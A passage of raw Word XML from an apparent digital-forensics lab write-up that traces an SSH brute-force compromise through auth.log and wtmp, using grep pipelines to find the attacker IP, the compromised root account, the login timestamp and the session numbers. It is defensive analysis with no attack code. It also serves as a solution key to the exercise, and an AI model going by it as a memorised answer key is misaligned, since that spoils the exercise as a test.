          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for log filtering and pattern identification, and a provided </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>utmp.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> script to parse the binary wtmp file into human-readable format. The auth.log was navigated systematically: first establishing the scope of the brute force attack, then narrowing to successful authentication events, and finally tracing post-authentication activity through session IDs and sudo logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564E8B7C">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1784C955">
      <w:pPr>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Identify the Attacker’s IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F9B084">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The auth.log was filtered for SSH-related events and then parsed to extract all IP addresses observed in failed login attempts. The following command was used to enumerate all unique IPs and their occurrence count:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BEFFCE">
      <w:pPr>
        <w:spacing w:before="40" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59320178">
      <w:pPr>
        <w:shd w:val="clear" w:fill="F0F4F8"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>grep sshd auth.log | grep -v pam_unix | grep -oP '[0-9]{1,3}(\.[0-9]{1,3}){3}' | sort | uniq -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D3FCF">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14442682">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This returned three IP addresses. Two of these were internal or low-frequency addresses. The third — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>65.2.161.68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — appeared </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>165 times</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, overwhelmingly associated with failed SSH authentication attempts. This volume and pattern is characteristic of automated credential stuffing or brute force tooling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7CF855">
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="62484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6248400" cy="3000375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A41929">
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 1: IP frequency analysis — 65.2.161.68 identified with the highest failed login count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519D17DE">
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6248400" cy="3000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6248400" cy="3000375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="311A3468">
      <w:pPr>
        <w:spacing w:before="0" w:after="200" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 2: auth.log entries showing repeated failed password attempts from 65.2.161.68.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1271" w:tblpY="112"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="94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650"/>
      </w:tblGrid>
      <w:tr w14:paraId="583BD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37EBCF7D">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attacker IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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257D3226">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>65.2.161.68</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D2C7A63">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBE5741">
      <w:pPr>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Identify the Compromised Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE4E1C2">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To identify the account the attacker successfully authenticated as, the auth.log was filtered for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Accepted password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> events originating from the attacker’s IP address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FEF15">
      <w:pPr>
        <w:spacing w:before="40" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9D65DB">
      <w:pPr>
        <w:shd w:val="clear" w:fill="F0F4F8"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>grep sshd auth.log | grep -v pam_unix | grep "Accepted password" | grep 65.2.161.68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED5B002">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D0B21EF">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The results confirmed a successful authentication for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> account. The session opened and closed within the same second, indicating this was an automated brute force tool confirming the discovered credentials rather than a human operator. Since </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cyberjunkie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was created by the attacker after gaining access, root was the account compromised through brute force.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343D1AD8">
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6248400" cy="3000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rcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6248400" cy="3000375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27428768">
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 3: Accepted password event for root account from attacker IP 65.2.161.68.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA8D4AE">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="94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650"/>
      </w:tblGrid>
      <w:tr w14:paraId="535E9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2313596A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Compromised Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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6089C503">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76DEB4CE">
      <w:pPr>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Identify the Manual Login Timestamp (wtmp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18432EAE">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The first successful root login was automated — the session was closed within the same second it was opened. To identify the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual interactive session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the wtmp binary artifact was parsed using the provided utmp.py script. The wtmp file records the precise moment an interactive terminal session was established, which differs from the password acceptance timestamp in auth.log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F50147">
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6248400" cy="2990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rcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6248400" cy="2990850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0901AA8E">
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 4: auth.log confirming root password accepted at 06:32:44 — followed by manual session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE6BBE9">
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6248400" cy="2990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rcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6248400" cy="2990850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D88009">
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 5: wtmp artifact parsed via utmp.py — manual session established at 2024-03-06 06:32:45 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FE2748">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The one-second difference between the auth.log timestamp (06:32:44) and the wtmp timestamp (06:32:45) reflects the system’s processing delay between password acceptance and terminal session establishment — confirming these represent the same manual login event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419C0B0C">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="94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650"/>
      </w:tblGrid>
      <w:tr w14:paraId="71C1D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48326804">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Manual Login Timestamp (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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01B399F3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2024-03-06 06:32:45</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27CA46EA">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B12B183">
      <w:pPr>
        <w:spacing w:before="260" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09683C8B">
      <w:pPr>
        <w:spacing w:before="260" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Identify the Attacker’s SSH Session Number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF3223B">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SSH login sessions are assigned sequential session numbers in auth.log. Filtering for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"session opened"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> events from the attacker IP revealed two root sessions: Session 34 and Session 37.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4785DB04">
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6248400" cy="2990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rcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6248400" cy="2990850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63253A63">
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 6: auth.log showing SSH sessions 34 and 37 opened from attacker IP 65.2.161.68.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB49EA8">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Session 34</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was opened and closed within the same second — consistent with automated brute force tool behaviour. </w:t>
      </w:r>
